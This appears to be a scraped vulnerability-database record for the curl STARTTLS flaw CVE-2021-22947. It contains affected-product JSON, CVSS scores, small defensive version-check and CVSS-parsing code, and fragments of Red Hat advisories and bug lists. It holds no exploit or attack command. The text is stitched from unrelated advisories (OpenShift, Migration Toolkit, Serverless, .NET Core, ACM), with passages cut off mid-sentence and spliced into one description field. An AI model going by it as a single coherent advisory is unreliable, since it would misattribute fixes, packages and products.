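fixed="7.68.0-1ubuntu2.7"
installed="7.68.0-1ubuntu2.5"   # placeholder value for illustration only

# sort -V orders version strings; if the installed version sorts first
# and differs from the fixed one, it predates the fix.
oldest="$(printf '%s\n%s\n' "$installed" "$fixed" | sort -V | head -n1)"
if [ "$oldest" = "$installed" ] && [ "$installed" != "$fixed" ]; then
    echo "curl $installed is older than $fixed: update needed"
else
    echo "curl $installed includes the fix"
fi
```

For an authoritative comparison (including epochs and `~` pre-release markers), `dpkg --compare-versions "$installed" ge "$fixed"` is the canonical tool on these systems.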
1983596 - CVE-2021-34558 golang: crypto/tls: certificate of wrong type is causing TLS client to panic
1992006 - CVE-2021-29923 golang: net: incorrect parsing of extraneous zero characters at the beginning of an IP address octet
1997017 - unprivileged client fails to get guest agent data
1998855 - Node drain: Sometimes source virt-launcher pod status is Failed and not Completed
2000251 - RoleBinding and ClusterRoleBinding brought in by kubevirt does not get reconciled when kind is ServiceAccount
2001270 - [VMIO] [Warm from Vmware] Snapshot files are not deleted after Successful Import
2001281 - [VMIO] [Warm from VMware] Source VM should not be turned ON if vmio import is removed
2001901 - [4.8.3] NNCP creation failures after nmstate-handler pod deletion
2007336 - 4.8.3 containers
2007776 - Failed to Migrate Windows VM with CDROM (readonly)
2008511 - [CNV-4.8.3] VMI is in LiveMigrate loop when Upgrading Cluster from 2.6.7/4.7.32 to OCP 4.8.13
2012890 - With descheduler during multiple VMIs migrations, some VMs are restarted
2025475 - [4.8.3] Upgrade from 2.6 to 4.x versions failed due to vlan-filtering issues
2026881 - [4.8.3] vlan-filtering is getting applied on veth ports
- Summary:
The Migration Toolkit for Containers (MTC) 1.5.2 is now available.

- Description:
The Migration Toolkit for Containers (MTC) enables you to migrate Kubernetes resources, persistent volume data, and internal container images between OpenShift Container Platform clusters, using the MTC web console or the Kubernetes API.

Bugs fixed (https://bugzilla.redhat.com/):
2000734 - CVE-2021-3757 nodejs-immer: prototype pollution may lead to DoS or remote code execution
2005438 - Combining Rsync and Stunnel in a single pod can degrade performance (1.5 backport)
2006842 - MigCluster CR remains in "unready" state and source registry is inaccessible after temporary shutdown of source cluster
2007429 - "oc describe" and "oc log" commands on "Migration resources" tree cannot be copied after failed migration
2022017 - CVE-2021-3948 mig-controller: incorrect namespaces handling may lead to not authorized usage of Migration Toolkit for Containers (MTC)
- Description:
Red Hat OpenShift Serverless release of the OpenShift Serverless Operator.
Security Fix(es):
- golang: net/http/httputil: panic due to racy read of persistConn after handler panic (CVE-2021-36221)
For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section. Bugs fixed (https://bugzilla.redhat.com/):
1995656 - CVE-2021-36221 golang: net/http/httputil: panic due to racy read of persistConn after handler panic 2016256 - Release of OpenShift Serverless Eventing 1.19.0 2016258 - Release of OpenShift Serverless Serving 1.19.0
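The record below pins the vulnerable range for CVE-2021-22947 at curl \u003e= 7.20.0 and \u003c 7.79.0. A minimal sketch of checking a plain curl version string against that range — a hypothetical helper for illustration, not part of any advisory tooling, and it assumes simple dotted numeric versions without distro suffixes:

```python
def curl_affected_by_cve_2021_22947(version: str) -> bool:
    """Return True if a curl version falls in the vulnerable range
    (>= 7.20.0 and < 7.79.0, per the affected_products ranges below).

    Assumes a plain dotted numeric version such as "7.78.0";
    distro-suffixed strings like "7.61.1-22.el7_9" are not handled.
    """
    v = tuple(int(part) for part in version.split("."))
    return (7, 20, 0) <= v < (7, 79, 0)
```

Tuple comparison makes the range check read exactly like the advisory's bounds, which is why no third-party version library is needed here.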
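The cvss block of the record stores severity as vector strings such as CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N. A minimal sketch (hypothetical helper, assuming the standard v3.x slash-separated vector format) that splits such a vector into its metric components:

```python
def parse_cvss_vector(vector: str) -> dict:
    """Split a CVSS v3.x vector string into its metrics.

    Example input (taken from the record below):
    CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N
    """
    parts = vector.split("/")
    if not parts[0].startswith("CVSS:"):
        raise ValueError("not a CVSS v3.x vector string")
    version = parts[0].split(":", 1)[1]
    # Remaining segments are key:value metric pairs, e.g. "AV:N".
    metrics = dict(part.split(":", 1) for part in parts[1:])
    return {"version": version, **metrics}
```

Such a parser makes it easy to compare, say, the integrity impact (I:H) across the NVD and VULHUB entries in the record.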
{
"affected_products": {
"_id": null,
"data": [
{
"_id": null,
"model": "h300s",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "h410s",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "communications cloud native core binding support function",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "22.1.3"
},
{
"_id": null,
"model": "universal forwarder",
"scope": "eq",
"trust": 1.0,
"vendor": "splunk",
"version": "9.1.0"
},
{
"_id": null,
"model": "linux",
"scope": "eq",
"trust": 1.0,
"vendor": "debian",
"version": "9.0"
},
{
"_id": null,
"model": "h700s",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "communications cloud native core console",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "22.2.0"
},
{
"_id": null,
"model": "communications cloud native core service communication proxy",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "1.15.0"
},
{
"_id": null,
"model": "linux",
"scope": "eq",
"trust": 1.0,
"vendor": "debian",
"version": "11.0"
},
{
"_id": null,
"model": "universal forwarder",
"scope": "lt",
"trust": 1.0,
"vendor": "splunk",
"version": "9.0.6"
},
{
"_id": null,
"model": "sinec infrastructure network services",
"scope": "lt",
"trust": 1.0,
"vendor": "siemens",
"version": "1.0.1.1"
},
{
"_id": null,
"model": "communications cloud native core network function cloud native environment",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "1.10.0"
},
{
"_id": null,
"model": "universal forwarder",
"scope": "gte",
"trust": 1.0,
"vendor": "splunk",
"version": "9.0.0"
},
{
"_id": null,
"model": "communications cloud native core network repository function",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "22.2.0"
},
{
"_id": null,
"model": "mysql server",
"scope": "lte",
"trust": 1.0,
"vendor": "oracle",
"version": "8.0.26"
},
{
"_id": null,
"model": "communications cloud native core security edge protection proxy",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "22.1.1"
},
{
"_id": null,
"model": "linux",
"scope": "eq",
"trust": 1.0,
"vendor": "debian",
"version": "10.0"
},
{
"_id": null,
"model": "fedora",
"scope": "eq",
"trust": 1.0,
"vendor": "fedoraproject",
"version": "33"
},
{
"_id": null,
"model": "mysql server",
"scope": "gte",
"trust": 1.0,
"vendor": "oracle",
"version": "5.7.0"
},
{
"_id": null,
"model": "communications cloud native core network slice selection function",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "1.8.0"
},
{
"_id": null,
"model": "macos",
"scope": "lt",
"trust": 1.0,
"vendor": "apple",
"version": "12.3"
},
{
"_id": null,
"model": "universal forwarder",
"scope": "gte",
"trust": 1.0,
"vendor": "splunk",
"version": "8.2.0"
},
{
"_id": null,
"model": "curl",
"scope": "gte",
"trust": 1.0,
"vendor": "haxx",
"version": "7.20.0"
},
{
"_id": null,
"model": "mysql server",
"scope": "gte",
"trust": 1.0,
"vendor": "oracle",
"version": "8.0.0"
},
{
"_id": null,
"model": "universal forwarder",
"scope": "lt",
"trust": 1.0,
"vendor": "splunk",
"version": "8.2.12"
},
{
"_id": null,
"model": "peoplesoft enterprise peopletools",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "8.58"
},
{
"_id": null,
"model": "fedora",
"scope": "eq",
"trust": 1.0,
"vendor": "fedoraproject",
"version": "35"
},
{
"_id": null,
"model": "peoplesoft enterprise peopletools",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "8.57"
},
{
"_id": null,
"model": "peoplesoft enterprise peopletools",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "8.59"
},
{
"_id": null,
"model": "communications cloud native core binding support function",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "1.11.0"
},
{
"_id": null,
"model": "communications cloud native core network repository function",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "22.1.2"
},
{
"_id": null,
"model": "solidfire baseboard management controller",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "h500e",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "h700e",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "curl",
"scope": "lt",
"trust": 1.0,
"vendor": "haxx",
"version": "7.79.0"
},
{
"_id": null,
"model": "h300e",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "mysql server",
"scope": "lte",
"trust": 1.0,
"vendor": "oracle",
"version": "5.7.35"
},
{
"_id": null,
"model": "cloud backup",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "communications cloud native core network repository function",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "1.15.0"
},
{
"_id": null,
"model": "clustered data ontap",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "h500s",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "communications cloud native core network repository function",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "1.15.1"
},
{
"_id": null,
"model": "commerce guided search",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "11.3.2"
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2021-22947"
}
]
},
"credits": {
"_id": null,
"data": "Red Hat",
"sources": [
{
"db": "PACKETSTORM",
"id": "165631"
},
{
"db": "PACKETSTORM",
"id": "166714"
},
{
"db": "PACKETSTORM",
"id": "165209"
},
{
"db": "PACKETSTORM",
"id": "166279"
},
{
"db": "PACKETSTORM",
"id": "165135"
},
{
"db": "PACKETSTORM",
"id": "165099"
},
{
"db": "PACKETSTORM",
"id": "165053"
}
],
"trust": 0.7
},
"cve": "CVE-2021-22947",
"cvss": {
"_id": null,
"data": [
{
"cvssV2": [
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.6,
"id": "CVE-2021-22947",
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 1.0,
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.6,
"id": "VHN-381421",
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.1,
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"author": "nvd@nist.gov",
"availabilityImpact": "NONE",
"baseScore": 5.9,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"exploitabilityScore": 2.2,
"id": "CVE-2021-22947",
"impactScore": 3.6,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N",
"version": "3.1"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2021-22947",
"trust": 1.0,
"value": "MEDIUM"
},
{
"author": "VULHUB",
"id": "VHN-381421",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-381421"
},
{
"db": "NVD",
"id": "CVE-2021-22947"
}
]
},
"description": {
"_id": null,
"data": "When curl \u003e= 7.20.0 and \u003c= 7.78.0 connects to an IMAP or POP3 server to retrieve data using STARTTLS to upgrade to TLS security, the server can respond and send back multiple responses at once that curl caches. curl would then upgrade to TLS but not flush the in-queue of cached responses but instead continue using and trusting the responses it got *before* the TLS handshake as if they were authenticated. Using this flaw, it allows a Man-In-The-Middle attacker to first inject the fake responses, then pass-through the TLS traffic from the legitimate server and trick curl into sending data back to the user thinking the attacker\u0027s injected data comes from the TLS-protected server. A STARTTLS protocol injection flaw via man-in-the-middle was found in curl prior to 7.79.0. Such multiple \"pipelined\" responses are cached by curl. \nOver POP3 and IMAP an attacker can inject fake response data. Relevant releases/architectures:\n\n.NET Core on Red Hat Enterprise Linux ComputeNode (v. 7) - x86_64\n.NET Core on Red Hat Enterprise Linux Server (v. 7) - x86_64\n.NET Core on Red Hat Enterprise Linux Workstation (v. 7) - x86_64\n\n3. Description:\n\n.NET Core is a managed-software framework. It implements a subset of the\n.NET framework APIs and several new APIs, and it includes a CLR\nimplementation. \n\nSecurity Fix(es):\n\n* curl: Leak of authentication credentials in URL via automatic Referer\n(CVE-2021-22876)\n\n* curl: Bad connection reuse due to flawed path name checks\n(CVE-2021-22924)\n\n* curl: Requirement to use TLS not properly enforced for IMAP, POP3, and\nFTP protocols (CVE-2021-22946)\n\n* curl: Server responses received before STARTTLS processed after TLS\nhandshake (CVE-2021-22947)\n\nFor more details about the security issue(s), including the impact, a CVSS\nscore, acknowledgments, and other related information, refer to the CVE\npage(s) listed in the References section. 
Solution:\n\nFor details on how to apply this update, which includes the changes\ndescribed in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258\n\n5. Package List:\n\n.NET Core on Red Hat Enterprise Linux ComputeNode (v. 7):\n\nSource:\nrh-dotnet31-curl-7.61.1-22.el7_9.src.rpm\n\nx86_64:\nrh-dotnet31-curl-7.61.1-22.el7_9.x86_64.rpm\nrh-dotnet31-curl-debuginfo-7.61.1-22.el7_9.x86_64.rpm\nrh-dotnet31-libcurl-7.61.1-22.el7_9.x86_64.rpm\nrh-dotnet31-libcurl-devel-7.61.1-22.el7_9.x86_64.rpm\n\n.NET Core on Red Hat Enterprise Linux Server (v. 7):\n\nSource:\nrh-dotnet31-curl-7.61.1-22.el7_9.src.rpm\n\nx86_64:\nrh-dotnet31-curl-7.61.1-22.el7_9.x86_64.rpm\nrh-dotnet31-curl-debuginfo-7.61.1-22.el7_9.x86_64.rpm\nrh-dotnet31-libcurl-7.61.1-22.el7_9.x86_64.rpm\nrh-dotnet31-libcurl-devel-7.61.1-22.el7_9.x86_64.rpm\n\n.NET Core on Red Hat Enterprise Linux Workstation (v. Our key and\ndetails on how to verify the signature are available from\nhttps://access.redhat.com/security/team/key/\n\n7. Description:\n\nRed Hat Advanced Cluster Management for Kubernetes 2.2.10 images\n\nRed Hat Advanced Cluster Management for Kubernetes provides the\ncapabilities to address common challenges that administrators and site\nreliability engineers face as they work across a range of public and\nprivate cloud environments. \n\nClusters and applications are all visible and managed from a single console\n\u2014 with security policy built in. Bugs fixed (https://bugzilla.redhat.com/):\n\n2004944 - CVE-2021-23440 nodejs-set-value: type confusion allows bypass of CVE-2019-10747\n2006009 - CVE-2021-3795 semver-regex: inefficient regular expression complexity\n2013652 - RHACM 2.2.10 images\n\n5. 
-----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA256\n\n=====================================================================\n Red Hat Security Advisory\n\nSynopsis: Moderate: OpenShift Container Platform 4.10.3 security update\nAdvisory ID: RHSA-2022:0056-01\nProduct: Red Hat OpenShift Enterprise\nAdvisory URL: https://access.redhat.com/errata/RHSA-2022:0056\nIssue date: 2022-03-10\nCVE Names: CVE-2014-3577 CVE-2016-10228 CVE-2017-14502 \n CVE-2018-20843 CVE-2018-1000858 CVE-2019-8625 \n CVE-2019-8710 CVE-2019-8720 CVE-2019-8743 \n CVE-2019-8764 CVE-2019-8766 CVE-2019-8769 \n CVE-2019-8771 CVE-2019-8782 CVE-2019-8783 \n CVE-2019-8808 CVE-2019-8811 CVE-2019-8812 \n CVE-2019-8813 CVE-2019-8814 CVE-2019-8815 \n CVE-2019-8816 CVE-2019-8819 CVE-2019-8820 \n CVE-2019-8823 CVE-2019-8835 CVE-2019-8844 \n CVE-2019-8846 CVE-2019-9169 CVE-2019-13050 \n CVE-2019-13627 CVE-2019-14889 CVE-2019-15903 \n CVE-2019-19906 CVE-2019-20454 CVE-2019-20807 \n CVE-2019-25013 CVE-2020-1730 CVE-2020-3862 \n CVE-2020-3864 CVE-2020-3865 CVE-2020-3867 \n CVE-2020-3868 CVE-2020-3885 CVE-2020-3894 \n CVE-2020-3895 CVE-2020-3897 CVE-2020-3899 \n CVE-2020-3900 CVE-2020-3901 CVE-2020-3902 \n CVE-2020-8927 CVE-2020-9802 CVE-2020-9803 \n CVE-2020-9805 CVE-2020-9806 CVE-2020-9807 \n CVE-2020-9843 CVE-2020-9850 CVE-2020-9862 \n CVE-2020-9893 CVE-2020-9894 CVE-2020-9895 \n CVE-2020-9915 CVE-2020-9925 CVE-2020-9952 \n CVE-2020-10018 CVE-2020-11793 CVE-2020-13434 \n CVE-2020-14391 CVE-2020-15358 CVE-2020-15503 \n CVE-2020-25660 CVE-2020-25677 CVE-2020-27618 \n CVE-2020-27781 CVE-2020-29361 CVE-2020-29362 \n CVE-2020-29363 CVE-2021-3121 CVE-2021-3326 \n CVE-2021-3449 CVE-2021-3450 CVE-2021-3516 \n CVE-2021-3517 CVE-2021-3518 CVE-2021-3520 \n CVE-2021-3521 CVE-2021-3537 CVE-2021-3541 \n CVE-2021-3733 CVE-2021-3749 CVE-2021-20305 \n CVE-2021-21684 CVE-2021-22946 CVE-2021-22947 \n CVE-2021-25215 CVE-2021-27218 CVE-2021-30666 \n CVE-2021-30761 CVE-2021-30762 CVE-2021-33928 \n CVE-2021-33929 CVE-2021-33930 
CVE-2021-33938 \n CVE-2021-36222 CVE-2021-37750 CVE-2021-39226 \n CVE-2021-41190 CVE-2021-43813 CVE-2021-44716 \n CVE-2021-44717 CVE-2022-0532 CVE-2022-21673 \n CVE-2022-24407 \n=====================================================================\n\n1. Summary:\n\nRed Hat OpenShift Container Platform release 4.10.3 is now available with\nupdates to packages and images that fix several bugs and add enhancements. \n\nRed Hat Product Security has rated this update as having a security impact\nof Moderate. A Common Vulnerability Scoring System (CVSS) base score, which\ngives a detailed severity rating, is available for each vulnerability from\nthe CVE link(s) in the References section. \n\n2. Description:\n\nRed Hat OpenShift Container Platform is Red Hat\u0027s cloud computing\nKubernetes application platform solution designed for on-premise or private\ncloud deployments. \n\nThis advisory contains the container images for Red Hat OpenShift Container\nPlatform 4.10.3. See the following advisory for the RPM packages for this\nrelease:\n\nhttps://access.redhat.com/errata/RHSA-2022:0055\n\nSpace precludes documenting all of the container images in this advisory. 
\nSee the following Release Notes documentation, which will be updated\nshortly for this release, for details about these changes:\n\nhttps://docs.openshift.com/container-platform/4.10/release_notes/ocp-4-10-release-notes.html\n\nSecurity Fix(es):\n\n* gogo/protobuf: plugin/unmarshal/unmarshal.go lacks certain index\nvalidation (CVE-2021-3121)\n* grafana: Snapshot authentication bypass (CVE-2021-39226)\n* golang: net/http: limit growth of header canonicalization cache\n(CVE-2021-44716)\n* nodejs-axios: Regular expression denial of service in trim function\n(CVE-2021-3749)\n* golang: syscall: don\u0027t close fd 0 on ForkExec error (CVE-2021-44717)\n* grafana: Forward OAuth Identity Token can allow users to access some data\nsources (CVE-2022-21673)\n* grafana: directory traversal vulnerability (CVE-2021-43813)\n\nFor more details about the security issue(s), including the impact, a CVSS\nscore, acknowledgments, and other related information, refer to the CVE\npage(s) listed in the References section. \n\nYou may download the oc tool and use it to inspect release image metadata\nas follows:\n\n(For x86_64 architecture)\n\n$ oc adm release info\nquay.io/openshift-release-dev/ocp-release:4.10.3-x86_64\n\nThe image digest is\nsha256:7ffe4cd612be27e355a640e5eec5cd8f923c1400d969fd590f806cffdaabcc56\n\n(For s390x architecture)\n\n $ oc adm release info\nquay.io/openshift-release-dev/ocp-release:4.10.3-s390x\n\nThe image digest is\nsha256:4cf21a9399da1ce8427246f251ae5dedacfc8c746d2345f9cfe039ed9eda3e69\n\n(For ppc64le architecture)\n\n $ oc adm release info\nquay.io/openshift-release-dev/ocp-release:4.10.3-ppc64le\n\nThe image digest is\nsha256:4ee571da1edf59dfee4473aa4604aba63c224bf8e6bcf57d048305babbbde93c\n\nAll OpenShift Container Platform 4.10 users are advised to upgrade to these\nupdated packages and images when they are available in the appropriate\nrelease channel. To check for available updates, use the OpenShift Console\nor the CLI oc command. 
Instructions for upgrading a cluster are available\nat\nhttps://docs.openshift.com/container-platform/4.10/updating/updating-cluster-cli.html\n\n3. Solution:\n\nFor OpenShift Container Platform 4.10 see the following documentation,\nwhich will be updated shortly for this release, for moderate instructions\non how to upgrade your cluster and fully apply this asynchronous errata\nupdate:\n\nhttps://docs.openshift.com/container-platform/4.10/release_notes/ocp-4-10-release-notes.html\n\nDetails on how to access this content are available at\nhttps://docs.openshift.com/container-platform/4.10/updating/updating-cluster-cli.html\n\n4. Bugs fixed (https://bugzilla.redhat.com/):\n\n1808240 - Always return metrics value for pods under the user\u0027s namespace\n1815189 - feature flagged UI does not always become available after operator installation\n1825034 - e2e: Mock CSI tests fail on IBM ROKS clusters\n1826225 - edge terminated h2 (gRPC) connections need a haproxy template change to work correctly\n1860774 - csr for vSphere egress nodes were not approved automatically during cert renewal\n1878106 - token inactivity timeout is not shortened after oauthclient/oauth config values are lowered\n1878925 - \u0027oc adm upgrade --to ...\u0027 rejects versions which occur only in history, while the cluster-version operator supports history fallback\n1880738 - origin e2e test deletes original worker\n1882983 - oVirt csi driver should refuse to provision RWX and ROX PV\n1886450 - Keepalived router id check not documented for RHV/VMware IPI\n1889488 - The metrics endpoint for the Scheduler is not protected by RBAC\n1894431 - Router pods fail to boot if the SSL certificate applied is missing an empty line at the bottom\n1896474 - Path based routing is broken for some combinations\n1897431 - CIDR support for additional network attachment with the bridge CNI plug-in\n1903408 - NodePort externalTrafficPolicy does not work for ovn-kubernetes\n1907433 - Excessive logging in image 
operator\n1909906 - The router fails with PANIC error when stats port already in use\n1911173 - [MSTR-998] Many charts\u0027 legend names show {{}} instead of words\n1914053 - pods assigned with Multus whereabouts IP get stuck in ContainerCreating state after node rebooting. \n1916169 - a reboot while MCO is applying changes leaves the node in undesirable state and MCP looks fine (UPDATED=true)\n1917893 - [ovirt] install fails: due to terraform error \"Cannot attach Virtual Disk: Disk is locked\" on vm resource\n1921627 - GCP UPI installation failed due to exceeding gcp limitation of instance group name\n1921650 - CVE-2021-3121 gogo/protobuf: plugin/unmarshal/unmarshal.go lacks certain index validation\n1926522 - oc adm catalog does not clean temporary files\n1927478 - Default CatalogSources deployed by marketplace do not have toleration for tainted nodes. \n1928141 - kube-storage-version-migrator constantly reporting type \"Upgradeable\" status Unknown\n1928285 - [LSO][OCS][arbiter] OCP Console shows no results while in fact underlying setup of LSO localvolumeset and it\u0027s storageclass is not yet finished, confusing users\n1931594 - [sig-cli] oc --request-timeout works as expected fails frequently on s390x\n1933847 - Prometheus goes unavailable (both instances down) during 4.8 upgrade\n1937085 - RHV UPI inventory playbook missing guarantee_memory\n1937196 - [aws ebs csi driver] events for block volume expansion may cause confusion\n1938236 - vsphere-problem-detector does not support overriding log levels via storage CR\n1939401 - missed labels for CMO/openshift-state-metric/telemeter-client/thanos-querier pods\n1939435 - Setting an IPv6 address in noProxy field causes error in openshift installer\n1939552 - [sig-api-machinery] CustomResourcePublishOpenAPI [Privileged:ClusterAdmin] works for CRD preserving unknown fields in an embedded object [Conformance] [Suite:openshift/conformance/parallel/minimal] [Suite:k8s]\n1942913 - ThanosSidecarUnhealthy isn\u0027t 
resilient to WAL replays. \n1943363 - [ovn] CNO should gracefully terminate ovn-northd\n1945274 - ostree-finalize-staged.service failed while upgrading a rhcos node to 4.6.17\n1948080 - authentication should not set Available=False APIServices_Error with 503s\n1949262 - Prometheus Statefulsets should have 2 replicas and hard affinity set\n1949672 - [GCP] Update 4.8 UPI template to match ignition version: 3.2.0\n1950827 - [LSO] localvolumediscoveryresult name is not friendly to customer\n1952576 - csv_succeeded metric not present in olm-operator for all successful CSVs\n1953264 - \"remote error: tls: bad certificate\" logs in prometheus-operator container\n1955300 - Machine config operator reports unavailable for 23m during upgrade\n1955489 - Alertmanager Statefulsets should have 2 replicas and hard affinity set\n1955490 - Thanos ruler Statefulsets should have 2 replicas and hard affinity set\n1955544 - [IPI][OSP] densed master-only installation with 0 workers fails due to missing worker security group on masters\n1956496 - Needs SR-IOV Docs Upstream\n1956739 - Permission for authorized_keys for core user changes from core user to root when changed the pull secret\n1956776 - [vSphere] Installer should do pre-check to ensure user-provided network name is valid\n1956964 - upload a boot-source to OpenShift virtualization using the console\n1957547 - [RFE]VM name is not auto filled in dev console\n1958349 - ovn-controller doesn\u0027t release the memory after cluster-density run\n1959352 - [scale] failed to get pod annotation: timed out waiting for annotations\n1960378 - icsp allows mirroring of registry root - install-config imageContentSources does not\n1960674 - Broken test: [sig-imageregistry][Serial][Suite:openshift/registry/serial] Image signature workflow can push a signed image to openshift registry and verify it [Suite:openshift/conformance/serial]\n1961317 - storage ClusterOperator does not declare ClusterRoleBindings in relatedObjects\n1961391 - String 
updates\n1961509 - DHCP daemon pod should have CPU and memory requests set but not limits\n1962066 - Edit machine/machineset specs not working\n1962206 - openshift-multus/dhcp-daemon set should meet platform requirements for update strategy that have maxUnavailable update of 10 or 33 percent\n1963053 - `oc whoami --show-console` should show the web console URL, not the server api URL\n1964112 - route SimpleAllocationPlugin: host name validation errors: spec.host: Invalid value: ... must be no more than 63 characters\n1964327 - Support containers with name:tag@digest\n1964789 - Send keys and disconnect does not work for VNC console\n1965368 - ClusterQuotaAdmission received non-meta object - message constantly reported in OpenShift Container Platform 4.7\n1966445 - Unmasking a service doesn\u0027t work if it masked using MCO\n1966477 - Use GA version in KAS/OAS/OauthAS to avoid: \"audit.k8s.io/v1beta1\" is deprecated and will be removed in a future release, use \"audit.k8s.io/v1\" instead\n1966521 - kube-proxy\u0027s userspace implementation consumes excessive CPU\n1968364 - [Azure] when using ssh type ed25519 bootstrap fails to come up\n1970021 - nmstate does not persist its configuration due to overlay systemd-connections-merged mount\n1970218 - MCO writes incorrect file contents if compression field is specified\n1970331 - [sig-auth][Feature:SCC][Early] should not have pod creation failures during install [Suite:openshift/conformance/parallel]\n1970805 - Cannot create build when docker image url contains dir structure\n1972033 - [azure] PV region node affinity is failure-domain.beta.kubernetes.io instead of topology.kubernetes.io\n1972827 - image registry does not remain available during upgrade\n1972962 - Should set the minimum value for the `--max-icsp-size` flag of `oc adm catalog mirror`\n1973447 - ovn-dbchecker peak memory spikes to ~500MiB during cluster-density run\n1975826 - ovn-kubernetes host directed traffic cannot be offloaded as CT zone 64000 is not 
established\n1976301 - [ci] e2e-azure-upi is permafailing\n1976399 - During the upgrade from OpenShift 4.5 to OpenShift 4.6 the election timers for the OVN north and south databases did not change. \n1976674 - CCO didn\u0027t set Upgradeable to False when cco mode is configured to Manual on azure platform\n1976894 - Unidling a StatefulSet does not work as expected\n1977319 - [Hive] Remove stale cruft installed by CVO in earlier releases\n1977414 - Build Config timed out waiting for condition 400: Bad Request\n1977929 - [RFE] Display Network Attachment Definitions from openshift-multus namespace during OCS deployment via UI using Multus\n1978528 - systemd-coredump started and failed intermittently for unknown reasons\n1978581 - machine-config-operator: remove runlevel from mco namespace\n1979562 - Cluster operators: don\u0027t show messages when neither progressing, degraded or unavailable\n1979962 - AWS SDN Network Stress tests have not passed in 4.9 release-openshift-origin-installer-e2e-aws-sdn-network-stress-4.9\n1979966 - OCP builds always fail when run on RHEL7 nodes\n1981396 - Deleting pool inside pool page the pool stays in Ready phase in the heading\n1981549 - Machine-config daemon does not recover from broken Proxy configuration\n1981867 - [sig-cli] oc explain should contain proper fields description for special types [Suite:openshift/conformance/parallel]\n1981941 - Terraform upgrade required in openshift-installer to resolve multiple issues\n1982063 - \u0027Control Plane\u0027 is not translated in Simplified Chinese language in Home-\u003eOverview page\n1982498 - Default registry credential path should be adjusted to use containers/auth.json for oc commands\n1982662 - Workloads - DaemonSets - Add storage: i18n misses\n1982726 - kube-apiserver audit logs show a lot of 404 errors for DELETE \"*/secrets/encryption-config\" on single node clusters\n1983758 - upgrades are failing on disruptive tests\n1983964 - Need Device plugin configuration for the NIC 
\"needVhostNet\" \u0026 \"isRdma\"\n1984592 - global pull secret not working in OCP4.7.4+ for additional private registries\n1985073 - new-in-4.8 ExtremelyHighIndividualControlPlaneCPU fires on some GCP update jobs\n1985486 - Cluster Proxy not used during installation on OSP with Kuryr\n1985724 - VM Details Page missing translations\n1985838 - [OVN] CNO exportNetworkFlows does not clear collectors when deleted\n1985933 - Downstream image registry recommendation\n1985965 - oVirt CSI driver does not report volume stats\n1986216 - [scale] SNO: Slow Pod recovery due to \"timed out waiting for OVS port binding\"\n1986237 - \"MachineNotYetDeleted\" in Pending state , alert not fired\n1986239 - crictl create fails with \"PID namespace requested, but sandbox infra container invalid\"\n1986302 - console continues to fetch prometheus alert and silences for normal user\n1986314 - Current MTV installation for KubeVirt import flow creates unusable Forklift UI\n1986338 - error creating list of resources in Import YAML\n1986502 - yaml multi file dnd duplicates previous dragged files\n1986819 - fix string typos for hot-plug disks\n1987044 - [OCPV48] Shutoff VM is being shown as \"Starting\" in WebUI when using spec.runStrategy 